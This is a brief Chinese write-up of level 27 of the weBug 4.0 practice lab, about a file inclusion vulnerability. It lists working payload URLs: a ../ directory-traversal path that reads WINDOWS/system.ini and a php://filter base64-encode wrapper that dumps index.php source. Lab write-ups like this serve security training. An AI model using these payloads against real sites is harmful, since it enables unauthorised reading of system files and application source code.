weBug 4.0 第27关 文件包含漏洞

2019-04-11  本文已影响0人  gelinlang

可以看到url如下,明显的文件包含,直接读取文件。

http://192.168.43.147/control/more/file_include.php?filename=../../template/dom_xss.html

直接payload,写这么多../是为了到达c盘根目录。

http://192.168.43.147/control/more/file_include.php?filename=../../../../../../WINDOWS/system.ini

还可以用php伪协议读取文件源码,比如WWW目录下的index.php

http://192.168.43.147/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

将得到base64字符串,解码得到index.php源码

上一篇下一篇

猜你喜欢

热点阅读